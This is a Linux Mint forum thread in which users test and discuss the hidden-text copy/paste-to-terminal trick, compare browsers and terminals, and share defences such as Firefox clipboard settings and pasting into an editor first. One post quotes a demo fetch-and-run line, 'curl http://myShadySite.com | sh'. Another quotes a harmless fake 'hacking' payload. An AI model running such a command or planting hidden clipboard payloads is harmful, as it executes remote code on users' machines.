Possible Exploit with Copy/Paste to Terminal?
Forum rules
Topics in this forum are automatically closed 6 months after creation.
Topics in this forum are automatically closed 6 months after creation.
Possible Exploit with Copy/Paste to Terminal?
Here, perhaps, is an object lesson in the dangers of laziness when working with BASH or PowerShell or other terminal environments.
Command line stuff is often complicated and it is easy to make typos that are hard to see if you are tired, stressed and/or inexperienced, so people often copy commands from websites that offer instructions on how to do or fix something.
This copy/pasting of commands apparently can be exploited.
A techie friend, who brought this to my attentions, has tested the (non-dangerous, not run as root) exploit demo outlined in the link below on his Android phone, and it works for him.
http://lifepluslinux.blogspot.com/2017/ ... te-to.html
This is cool in a worrisome sort of way. But I am pleased to say it doesn't work in my terminal on Linux Mint 20 copying from Vivaldi. I just get the normal output I would get from running ls -lat.
It I copy/paste the selection from the website into a text only app or paste without formatting into a word-processor app, I just get the text, ls-lat.
If I inspect the element, ls -lat, in the web page with Vivaldi's dev-tools, I can see that something is very wrong, but what is wrong seems not to copy/paste over.
Notwithstanding, I do copy/paste of command line code all the time. I guess I shouldn't be so lazy.
Command line stuff is often complicated and it is easy to make typos that are hard to see if you are tired, stressed and/or inexperienced, so people often copy commands from websites that offer instructions on how to do or fix something.
This copy/pasting of commands apparently can be exploited.
A techie friend, who brought this to my attentions, has tested the (non-dangerous, not run as root) exploit demo outlined in the link below on his Android phone, and it works for him.
http://lifepluslinux.blogspot.com/2017/ ... te-to.html
This is cool in a worrisome sort of way. But I am pleased to say it doesn't work in my terminal on Linux Mint 20 copying from Vivaldi. I just get the normal output I would get from running ls -lat.
It I copy/paste the selection from the website into a text only app or paste without formatting into a word-processor app, I just get the text, ls-lat.
If I inspect the element, ls -lat, in the web page with Vivaldi's dev-tools, I can see that something is very wrong, but what is wrong seems not to copy/paste over.
Notwithstanding, I do copy/paste of command line code all the time. I guess I shouldn't be so lazy.
Last edited by LockBot on Wed Dec 28, 2022 7:16 am, edited 1 time in total.
Reason: Topic automatically closed 6 months after creation. New replies are no longer allowed.
Reason: Topic automatically closed 6 months after creation. New replies are no longer allowed.
Re: Possible Exploit with Copy/Paste to Terminal?
I tried both in Firefox and Chromium but neither copies invisible text so only the also in the browser visible "ls -lat" text is copied. I had to remove the "malicious" class from the span with the hidden text on the webpage to make it visible to be able to copy the (no longer) hidden text from Firefox or Chromium. Gnome Web did copy the text without having to make it visible.
I use Tilix as terminal and it prompted me with a warning when pasting the copied text with the malicious part in it:
Gnome Terminal just ran it. I guess Gnome Web and Gnome Terminal could do with some improvement.
I use Tilix as terminal and it prompted me with a warning when pasting the copied text with the malicious part in it:
Gnome Terminal just ran it. I guess Gnome Web and Gnome Terminal could do with some improvement.
Re: Possible Exploit with Copy/Paste to Terminal?
I just get
ls -lat
in two terminals, two browsers and leafpad. I pasted it into leafpad, saved it as ls.txt, and then
Code: Select all
$ od -a ls.txt
0000000 l s sp - l a t
0000007
Please edit your original post title to include [SOLVED] if/when it is solved!
Your data and OS are backed up....right?
Your data and OS are backed up....right?
Re: Possible Exploit with Copy/Paste to Terminal?
Interesting.
I selected the text in Brave, and on right click I have the option to "Search Google for "ls;clear..." etc, but when choosing Copy, it only copied the ls -lat.
I selected the text in Brave, and on right click I have the option to "Search Google for "ls;clear..." etc, but when choosing Copy, it only copied the ls -lat.
Re: Possible Exploit with Copy/Paste to Terminal?
There is nothing between
BTW, the commands it was supposed to run are:
I got it from the page's source.
I suppose you can avoid something like this catching you out by pasting first in an editor. That said, not everyone will understand what they're looking at.
ls
and -lat
for me, but I don't just allow every site script access. This is definitely worrisome though, if this is somehow catching people out. As if copy-pasting weren't problematic enough already.BTW, the commands it was supposed to run are:
Code: Select all
; clear; echo 'Haha! You gave me access to your computer with sudo!';
echo -ne 'h4cking ## (10%)\r';
sleep 0.3;
echo -ne 'h4cking ### (20%)\r';
sleep 0.3;
echo -ne 'h4cking ##### (33%)\r';
sleep 0.3;
echo -ne 'h4cking ####### (40%)\r';
sleep 0.3;
echo -ne 'h4cking ########## (50%)\r';
sleep 0.3;
echo -ne 'h4cking ############# (66%)\r';
sleep 0.3;
echo -ne 'h4cking ##################### (99%)\r';
sleep 0.3;
echo -ne 'h4cking ####################### (100%)\r';
echo -ne '\n';
echo 'Hacking complete.';
echo 'Use GUI interface using visual basic to track my IP'<br /> ls
I suppose you can avoid something like this catching you out by pasting first in an editor. That said, not everyone will understand what they're looking at.
I'm also Terminalforlife on GitHub.
- BenTrabetere
- Level 7
- Posts: 1890
- Joined: Sat Jul 19, 2014 12:04 am
- Location: Hattiesburg, MS USA
Re: Possible Exploit with Copy/Paste to Terminal?
The exploit did not work for me with Firefox and Gnome Terminal. I just got output from
The article claims, "This can be worse. If the code snippet had a command with sudo for instance, the malicious code will have sudo access too."
Please correct me if I am wrong, but if this was an exploit and it the command had sudo, you would still have to enter your password in order for the command to work. Yes? (It upsets me to think that too many people would enter a password without hesitation.)
@Termy
+1 for pasting commands to a text editor before pasting to a terminal. I have been doing that for several years.
ls -lat
.The article claims, "This can be worse. If the code snippet had a command with sudo for instance, the malicious code will have sudo access too."
Please correct me if I am wrong, but if this was an exploit and it the command had sudo, you would still have to enter your password in order for the command to work. Yes? (It upsets me to think that too many people would enter a password without hesitation.)
@Termy
+1 for pasting commands to a text editor before pasting to a terminal. I have been doing that for several years.
Patreon sponsor since August 2022
Re: Possible Exploit with Copy/Paste to Terminal?
Yes.BenTrabetere wrote: ⤴Mon Jan 25, 2021 12:04 am if this was an exploit and it the command had sudo, you would still have to enter your password
Re: Possible Exploit with Copy/Paste to Terminal?
One of the many things that I turn off in the Firefox about:config
dom.event.clipboardevents.enabled
https://briantracy.xyz/writing/copy-paste-shell.html
dom.event.clipboardevents.enabled
https://briantracy.xyz/writing/copy-paste-shell.html
Re: Possible Exploit with Copy/Paste to Terminal?
Very nice! I'm going to incorporate a check for that into UbuChk. I really should have a whole Firefox section for it. Do you know of any other awesome parameters to change for security or as an optimization?
Also, do you know if this is specifically for Firefox, or something which will work for most Firefox-based browsers?
I'm also Terminalforlife on GitHub.
Re: Possible Exploit with Copy/Paste to Terminal?
dom.event.clipboardevents.enabled is 'true' in my Firefox so I would expect that website to do something scary but it doesn't?
When I copy the text in the red bar and paste it here, I do get this:
echo "this could have been [curl http://myShadySite.com | sh]"
But on the terminal it again only pastes the visible text:
echo "looks safe to me!"
. And it also prints "looks safe to me!" and nothing more.Re: Possible Exploit with Copy/Paste to Terminal?
Do you have scripting allowed for the page? You might actually have some other feature in place in your browser to protect against this. I use NoScript which blocks scripts unless I allow it.
I'm also Terminalforlife on GitHub.
Re: Possible Exploit with Copy/Paste to Terminal?
As I shared, it does change the copied text when pasting here:
xenopeek wrote: ⤴Thu Jan 28, 2021 10:12 am When I copy the text in the red bar and paste it here, I do get this: echo "this could have been [curl http://myShadySite.com | sh]"
Re: Possible Exploit with Copy/Paste to Terminal?
Oh yeah -- my bad. I misread.
I'm also Terminalforlife on GitHub.
Re: Possible Exploit with Copy/Paste to Terminal?
Cool perl script project! The whole "Firefox about:config" is a topic onto itself. I have a about 10 preferences set to false (unless otherwise specified) for personal preference and added security/privacy:Termy wrote: ⤴Thu Jan 28, 2021 9:28 amVery nice! I'm going to incorporate a check for that into UbuChk. I really should have a whole Firefox section for it. Do you know of any other awesome parameters to change for security or as an optimization?
Also, do you know if this is specifically for Firefox, or something which will work for most Firefox-based browsers?
Here is a reference for many many more: https://github.com/arkenfox/user.js/blob/master/user.jsbrowser.backspace_action=2
geo.enabled
extensions.pocket.enabled
network.http.sendRefererHeader=0
browser.newtabpage.enabled
browser.urlbar.trimURLs
keyword.enabled
browser.fixup.alternate.enabled
media.autoplay.enabled
I also install uBlock Origin and uMatrix.
I use TenFourFox a Firefox-based browser for PowerPC Mac and the settings work the same as Firefox on Linux Mint. Some setting types change with newer and older versions of Firefox.
Re: Possible Exploit with Copy/Paste to Terminal?
Thank you muchly! I'll look into all of those. Very cool stuff.
Update:
From looking into this a bit and actually starting to add it to UbuChk, I've ran into some walls. Firefox does NOT make this process easy. Might make a thread for this, to see if anyone has managed to do this successfully, plus I don't want to derail this thread. It might just not be viable for UbuChk, sadly.
Done, in-case anyone is curious: viewtopic.php?f=213&t=341311
I'm also Terminalforlife on GitHub.
-
- Level 4
- Posts: 443
- Joined: Fri Sep 23, 2016 10:19 am
Re: Possible Exploit with Copy/Paste to Terminal?
I realize I'm posting a month late to the discussion, but this may still be helpful to point out.xenopeek wrote: ⤴Mon Jan 25, 2021 3:53 amYes.BenTrabetere wrote: ⤴Mon Jan 25, 2021 12:04 am if this was an exploit and it the command had sudo, you would still have to enter your password
One thing about "sudo" use is that once you successfully use sudo in a terminal, you do not need to reenter your password to use it again for a set time (5 minutes?). Thus, if a user had recently run a sudo command, and then blindly pasted a malicious sudo command, it *could* run without re-asking for the password.
Re: Possible Exploit with Copy/Paste to Terminal?
Yeah -- the password (credentials, specifically) is cached for 15 minutes, by default; this is mentioned in the sudo(8) manual page. This can be adjusted, however, to be as long or short as you like, by editing the '/etc/sudoers' file. Look at the sudoers(5) manual page for information on how to change this:
man sudoers
I'm also Terminalforlife on GitHub.
Re: Possible Exploit with Copy/Paste to Terminal?
You can run
sudo -k
to reset that timer so next sudo command will ask the password again. Also, the timer is per session: if you open a new terminal, or a new tab in your terminal, the first sudo command on that will always ask the password.